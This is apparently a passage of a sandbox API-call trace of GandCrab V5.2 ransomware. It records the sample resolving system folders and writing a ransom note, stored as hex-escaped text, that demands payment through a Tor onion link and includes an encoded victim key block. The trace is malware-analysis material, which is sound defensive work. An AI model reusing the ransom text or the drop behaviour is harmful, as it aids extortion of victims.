lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0073.353] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0073.353] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.354] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.354] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.355] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\TITWMVJL-DECRYPT.txt") returned 88 [0073.355] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0073.355] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4